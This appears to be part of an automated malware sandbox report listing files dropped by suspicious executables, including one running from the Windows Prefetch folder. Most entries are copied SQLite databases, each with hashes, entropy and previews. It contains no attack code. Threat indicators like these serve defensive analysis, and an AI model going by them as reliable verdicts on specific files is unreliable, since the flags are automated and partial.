                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.293660689688185
                                                            Encrypted:false
                                                            SSDEEP:3:D3XHE/QhjN:rXHWQhjN
                                                            MD5:F88063CD0C6B5F38DAED028E51D72C36
                                                            SHA1:F13EA4831DE1625BB32F047D19B99B475CB74902
                                                            SHA-256:FE05CE78FC4BC5DB4658C9F46E8674AFE80EAC4F54692CA7CC18382807DA3675
                                                            SHA-512:6E55450CF6C7A70E145268722E55242CC0A291B4E4135075D4AE5694B5C77EDC54022A5BD70AA8527944CD7E2E74675BC58450EE0822772F60959FDAE4E54C6A
                                                            Malicious:false
                                                            Preview:usR2bLOZuIZOZN8yencVlHxY6
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
